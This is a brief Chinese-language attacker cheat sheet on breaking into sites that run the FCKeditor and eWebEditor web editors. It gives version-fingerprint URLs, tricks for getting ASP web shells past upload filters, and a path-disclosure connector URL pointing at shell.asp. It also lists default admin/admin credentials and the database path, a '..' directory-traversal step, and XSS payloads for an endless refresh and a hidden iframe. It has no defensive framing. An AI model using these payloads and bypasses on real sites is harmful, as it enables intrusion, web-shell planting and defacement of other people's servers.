fckeditor
查看编辑器版本:
FCKeditor/_whatsnew.html
/fckeditor/editor/dialog/fck_about.html
2.2版本:
Apache+linux环境下在上传文件后面加个.突破
低版本可尝试二次上传
高版本抓包创建两个文件夹/xx.asp/x.asp
会有一个不被过滤
爆路径漏
洞:FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?
Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
webeditor默认密码:admin admin
admin_login.asp
数据库:/db/ewebeditor.mdb
拒绝访问的情况下:
网址后加admin/editor/admin_uploadfile.asp
返回上一级目录:
?id=改为id=&dir=.. 加/..可继续返回上一级目录
XSS使网页不停刷新:
<meta http-equiv="refresh" content="0;">
嵌入其他网站:
<iframe src=网址 widtth=0 height=0></iframe>
XSS分类:
反射型XSS
存储型XSS
DOMXSS
火狐浏览器插件:
Hackbar
Firebug
Tamper Data
Live HTTP Headers
Editor Cookie
View source chart